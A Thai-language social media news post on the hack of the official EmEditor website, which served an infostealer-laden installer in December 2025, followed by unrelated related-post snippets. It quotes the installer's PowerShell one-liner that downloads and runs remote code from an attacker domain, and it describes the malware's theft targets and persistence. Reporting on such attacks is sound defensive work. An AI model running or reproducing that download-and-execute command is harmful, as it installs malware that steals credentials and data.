เว็บไซต์ทางการ EmEditor Editorเป็นฐานปล่อยมัลแวร์

เว็บไซต์อย่างเป็นทางการของ EmEditor Editor ถูกแฮกเพื่อใช้เป็นฐานปล่อยมัลแวร์

การปล่อยมัลแวร์ใส่เหยื่อนั้นหลายครั้งมักจะเป็นการใช้วิธีการหลอกลวงแบบ Phishing เพื่อให้ดาวน์โหลดจากเว็บไซต์ปลอม แต่ในบางครั้งเว็บไซต์จริงก็อาจถูกแฮกเพื่อนำมาใช้ในการปล่อยมัลแวร์ได้เช่นกัน

จากรายงานโดยเว็บไซต์ Cyber Security News ได้กล่าวถึงการตรวจพบแคมเปญการโจมตีในรูปแบบ การโจมตีห่วงโซ่อุปทาน หรือ Supply Chain Attacks ผ่านทางการแฮกเว็บไซต์อย่างเป็นทางการของเครื่องมือแก้ไขข้อความยอดนิยม EmEditor Editor เพื่อปล่อยมัลแวร์ประเภทขโมยข้อมูลจากเครื่องของเหยื่อ หรือ Infostealer (ซึ่งแหล่งข่าวไม่ได้ระบุชื่อไว้) ด้วยการแฮกเพื่อเปลี่ยนเส้นทางการดาวน์โหลด (Download Path) จากไฟล์ดาวน์โหลดของแท้ ไปยังไฟล์ปลอมที่มีการสอดแทรกมัลแวร์ไว้แทน ซึ่งการแจ้งเตือนเรื่องแคมเปญดังกล่าวนั้นมาจากทางบริษัทผู้พัฒนา EmEditor Editor เอง โดยทางบริษัทได้แจ้งเตือนว่า การแฮกเกิดขึ้นระหว่างวันที่ 19 - 22 ธันวาคม ค.ศ. 2025 (พ.ศ. 2568) ที่ผ่านมา ซึ่งนับระยะเวลาเพียงแค่ 4 วันเท่านั้น แต่ใน 4 วันนี้ผู้ที่ดาวน์โหลด EmEditor Editor เวอร์ชัน 25.4.3 ผ่านทางปุ่ม Download Now ที่อยู่บนเว็บไซต์ ถือว่าเป็นผู้อยู่ใต้ความเสี่ยง เนื่องจากไฟล์ที่ดาวน์โหลดไปนั้นเป็นแอปพลิเคชันปลอม

โดยไฟล์แอปพลิเคชันปลอมดังกล่าวนั้น รูปร่างหน้าตาของไฟล์ติดตั้งจะดูเหมือนกับไฟล์ติดตั้งของแท้มากจนแทบแยกไม่ออก แต่ลายเซ็นดิจิทัล (Digital Signature) ที่อยู่บนตัวไฟล์นั้น แทนที่จะเป็นของทางบริษัท กลับเป็นของบริษัทที่ไม่มีที่มาที่ไปอย่าง “WALSHAM INVESTMENTS LIMITED” แทน ทำให้เป็นจุดสังเกตที่มองเห็นได้ชัดเจนว่าไฟล์ไหนจริง ไฟล์ไหนปลอม ซึ่งสำหรับไฟล์ติดตั้งนี้ ทางทีมวิจัยจาก Qianxin บริษัทผู้พัฒนาซอฟต์แวร์แอนตี้ไวรัสจากจีน ยังได้เผยอีกว่ามีการตรวจพบไฟล์มัลแวร์ (Payload) แบบ Infostealer ฝังตัว (Embeded) อยู่บนไฟล์ติดตั้งปลอมในรูปแบบโค้ด VBScript

ซึ่งโค้ดดังกล่าวนั้นจะถูกรันขึ้นมาระหว่างขั้นตอนการติดตั้ง ที่จะนำไปสู่การรันคำสั่ง PowerShell powershell.exe “irm emeditorjp.com | iex” ขึ้นมาโดยคำสั่งนี้จะนำไปสู่การรันโค้ดมัลแวร์ลงบนหน่วยความจำ (Memory) โดยตรง ทำให้เครื่องมือรักษาความปลอดภัยบนเครื่องส่วนมากมักจะไม่สามารถตรวจพบได้ เนื่องจากไม่เหลือไฟล์มัลแวร์ทิ้งไว้บนฮาร์ดดิสก์ให้ตรวจสอบ

มัลแวร์ที่ไม่ปรากฏชื่อตัวนี้นั้น มีความสามารถในการขโมยข้อมูลมากมาย โดยหลังจากติดตั้งนั้น มัลแวร์จะเริ่มทำการขโมยข้อมูลจากเว็บเบราว์เซอร์ Chrome, Edge, Brave, และ Opera ในทันที โดยข้อมูลจะครอบคลุมตั้งแต่ ไฟล์ Cookies, ข้อมูลการเข้าเว็บไซต์ต่าง ๆ, และข้อมูลการล็อกอิน แล้วจึงทำการเข้าบุกขโมยข้อมูลแอปพลิเคชันสำหรับการทำงานที่องค์กรต่าง ๆ นิยมใช้งาน เช่น Discord, Slack, Zoom, Microsoft Teams, WinSCP, และ PuTTY อีกด้วย ทำให้มัลแวร์ตัวนี้สามารถสร้างความเสียหายให้กับเหยื่อในระดับองค์กรธุรกิจได้อย่างมาก มากไปกว่านั้นตัวมัลแวร์ยังมีความสามารถในการขโมยรหัสเข้าใช้งานบัญชีโฆษณาบน Facebook, เข้าควบคุมข้อมูลบน Clipboard เพื่อขโมยข้อมูลเกี่ยวกับคริปโตเคอร์เรนซี และการสร้างการควบคุมจากระยะไกลเพื่อให้แฮกเกอร์สามารถเข้าขโมยข้อมูลเพิ่มเติมภายหลังได้

สำหรับในด้านการสร้างความคงทนของตัวมัลแวร์บนระบบ (Persistence) นั้น ตัวมัลแวร์จะใช้งานส่วนเสริม (Extension) ของเว็บเบราว์เซอร์ที่มีชื่อว่า “Google Drive Caching” ในการเข้าสู่เครื่องของเหยื่อโดยไม่ได้รับอนุญาตหลังจากที่ฝังตัวลงบนเครื่องได้สำเร็จ ซึ่งส่วนเสริมนี้จะมีฟีเจอร์ Domain Generation Algorithm ใช้ในการสร้างโดเมนเพื่อติดต่อกับเซิร์ฟเวอร์ควบคุม (C2 หรือ Command and Control) แบบค่าไม่คงที่ (Dynamic) ได้ ทำให้ตรวจสอบกวาดล้างได้ยากมาก

ทางบริษัทผู้พัฒนาได้แนะนำว่า ผู้ที่สงสัยว่าเครื่องติดมัลแวร์เรียบร้อยแล้วให้ทำการตัดอินเทอร์เน็ตในทันที แล้วเริ่มทำการสแกนกวาดล้างมัลแวร์ แล้วจึงทำการเปลี่ยนรหัสทุกอย่างที่มีบนเครื่องเพื่อความปลอดภัย

#ติดเทรนด์ #Lemon8ฮาวทู #ป้ายยากับlemon8 #lemon8ไดอารี่ #freedomhack

1/21 แก้ไขเป็น

โพสต์ที่เกี่ยวข้อง

แอปสำหรับลงทุน มือใหม่ต้องรู้‼️
อยากให้แนะนำแอปเป็นพิเศษคอมเม้นกันมาได้ครับ ❤️ #แอพลงทุน #มือใหม่ลงทุน #แอปเทรดหุ้น #แอพหารายได้
Invest easy

Invest easy

ถูกใจ 1098 ครั้ง

4 เว็บหารายได้ฉบับคนอยู่บ้าน🏠✨
1 https://fastwork.co/ 2 https://www.sheetly.store 3https://designhub.miricanvas.com/th/login 4 True ID app #เว็บหารายได้เสริม #เว็บไซต์หางาน #แอพสร้างรายได้ #งานออนไลน์ #ทำงานออนไลน์ง่ายๆ
Feb Story

Feb Story

ถูกใจ 3964 ครั้ง

ภาพประกาศรับสมัครสอบแข่งขันเพื่อบรรจุและแต่งตั้งบุคคลเข้ารับราชการของกรมศุลกากร ตำแหน่งนักวิชาการศุลกากรปฏิบัติการและนักทรัพยากรบุคคลปฏิบัติการ พร้อมข้อความแนะนำหนังสือและรีวิวการสอบ
ภาพหนังสือเตรียมสอบนักวิชาการศุลกากร 2 เล่ม ได้แก่ กฎหมายว่าด้วยศุลกากร และตะลุยโจทย์ พร้อมโปรโมชั่น Pre-order ซื้อ 2 เล่ม ราคา 1,040 บาท
ภาพกองหนังสือเตรียมสอบกรมศุลกากร สรุปเนื้อหาและคลังข้อสอบสนามจริง สำหรับทุกตำแหน่ง รวมถึงข้อสอบนักวิชาการศุลกากรปี 65 และ 61
กรมศุลกากรเปิดรับสมัครแล้ว!🎉✨
📣 นักวิชาการศุลกากร เปิดรับสมัครสอบแล้วค่ะ!! ✅ รับสมัครสอบตั้งแต่วันที่ 24 พฤศจิกายน - 17 ธันวาคม 2568 เป็นต้นไป ทดสอบเพื่อวัดความรู้ความสามารถที่ใช้เฉพาะตำแหน่ง โดยวิธีการสอบข้อเขียน จำนวน 200 ข้อ คะแนนเต็ม 200 คะแนน ใช้เวลาสอบ 3 ชั่วโมง ดังนี้ 1. ความรู้ทั่วไปเกี่ยวกับกรมศุลกากร 2. ความรู้
Suphanida.F

Suphanida.F

ถูกใจ 686 ครั้ง

ภาพแสดงหัวข้อ "การรู้เท่าทันสื่อ (Media Literacy) – แยกข่าวจริง-ข่าวปลอมในยุคที่ข่าวปลอมไวกว่าไวไฟ..." พร้อมข้อความเน้นย้ำว่า "การแชร์โดยไม่คิด" คือสิ่งที่อันตรายที่สุด และเรากำลังต่อสู้กับข้อมูลที่ "ปลอมแต่เหมือนจริง"
ภาพแสดงหัวข้อ "สิ่งที่ต้องรู้ก่อนเริ่ม (Core Idea)" พร้อมรายการหลัก 5 ข้อ ได้แก่ การ��ประเมินแหล่งที่มา, การมีข้อมูลพิสูจน์รองรับ, จุดประสงค์ของผู้เผยแพร่ และการตรวจสอบจากหลายแหล่ง
ภาพอธิบาย "วิธีแยกข่าวจริง-ข่าวปลอม" โดยเริ่มจาก Step 1: ตรวจสอบหัวข่าวและความตั้งใจที่มักใช้คำชวนตกใจ และ Step 2: ตรวจสอบแหล่งข่าวว่าเป็นสื่อหลัก เว็บไซต์ทางการ หรือเพจที่ไม่น่าเชื่อถือ
วิธีเช็กข่าวปลอม | Media Literacy แบบเข้าใจง่าย
ในยุคที่ข่าวปลอมกระจายเร็วกว่าไวรัส การมีทักษะ Media Literacy คือสิ่งจำเป็นที่สุด เนื้อหานี้สรุปวิธีแยกข่าวจริง-ข่าวปลอมแบบง่าย ๆ ใช้ได้กับทุกคอนเทนต์บนโซเชียล เหมาะสำหรับคนที่ต้องการปกป้องตัวเองจากข้อมูลผิด ๆ และใช้สื่ออย่างฉลาดในโลกออนไลน์ #MediaLiteracy #ข่าวปลอม #ตรวจสอบข้อมูล #รู้เ
leeaonglee

leeaonglee

ถูกใจ 1 ครั้ง

พบกับเว็บไซต์อย่างเป็นทางการของเรา เร็วๆนี้
Dev panda

Dev panda

ถูกใจ 2 ครั้ง

พบมัลแวร์ WebRAT ปลอมตัวเป็นซอฟต์แวร์เถื่อน
พบมัลแวร์ WebRAT ปลอมตัวเป็นซอฟต์แวร์เถื่อน ระบาดอยู่บนเว็บดัง Github คงเป็นที่ทราบกันดี และซึ้งเข้าถึงในใจหลาย ๆ คนไปแล้ว กับการที่ซอฟต์แวร์เถื่อนนั้นไม่ใช่ของฟรีที่แท้จริง แต่มักจะมากับของแถมที่ไม่พึงประสงค์มากมาย โดยเฉพาะในระยะหลังที่ซอฟต์แวร์เถื่อนมักกลายเป็นที่แอบแฝงหรือกลายเป็นข้อแอบอ้างขอ
FreedomHack 󱢏

FreedomHack 󱢏

ถูกใจ 2 ครั้ง

ภาพหน้าจอแสดงอินเทอร์เฟซควบคุมของมัลแวร์ Cellik ที่กำลังจำลองหน้าจอโทรศัพท์ Android ซึ่งแสดงหน้า Google พร้อมคำว่า 'Cellik' ซ้อนทับอยู่ มีตัวเลือกการควบคุมคุณภาพและ FPS สำหรับการสตรีมหน้าจอแบบเรียลไทม์ และข้อมูลการเชื่อมต่อกับแบตเตอรี่ของอุปกรณ์เป้าหมาย
มัลแวร์ Cellik ปลอมเป็นแอปดังจาก Google Play
มัลแวร์ Cellik ปลอมเป็นแอปดังจาก Google Play มุ่งโจมตีผู้ใช้ Android การปลอมตัวเป็นแอปพลิเคชันชื่อดังนั้นเรียกว่าเป็นวิธีการแพร่กระจายยอดนิยมของมัลแวร์เลยทีเดียว ซึ่งมัลแวร์ที่ใช้วิธีการดังกล่าวก็มีอยู่มากมาย และมัลแวร์ตัวนี้ก็เรียกได้ว่าเป็นพัฒนาการอีกก้าวหนึ่งในการปลอมตัวระดับ "สั่งได้"
FreedomHack 󱢏

FreedomHack 󱢏

ถูกใจ 1 ครั้ง

ภาพแล็ปท็อปและสมาร์ทโฟนบนโต๊ะ พร้อมข้อความว่า "5 ฟรีแลนซ์ รายได้เกิน 200,000 บาท/เดือน" และไอคอนรูปเงิน
ภาพแสดง 5 อาชีพฟรีแลนซ์พร้อมช่วงรายได้ ได้แก่ Motion Graphic, Performance Marketer, UX/UI Freelance, Web Developer และ Content Creator หลังบ้าน
ภาพแล็ปท็อปพร้อมข้อความเกี่ยวกับ Content Creator หลังบ้าน ที่มีรายได้ 60K-250K และประสบการณ์ส่วนแบ่ง 30% จากเอเจนซี่
5 อาชีพฟรีแลนซ์ รายได้เกิน 200,000/เดือน
Motion เนี่ย เรารู้ว่าค่าจ้างแพง ก็ตอนเราจ้างเอง แพงกว่าตัดต่อทั่วไปหลายเท่า 1️⃣ Motion Graphic / Video Editor 📌 ช่วงรายได้ในตลาด: 80,000 – 250,000/เดือน เพราะทุกแพลตฟอร์มตอนนี้คือ “วิดีโอ” แบรนด์ต้องการวิดีโอคุณภาพสูง + เร็ว + สม่ำเสมอ รายได้มาจาก: • ตัด TikTok/Shorts รายชิ้น
Livewealthylife

Livewealthylife

ถูกใจ 2638 ครั้ง

ดูเพิ่มเติม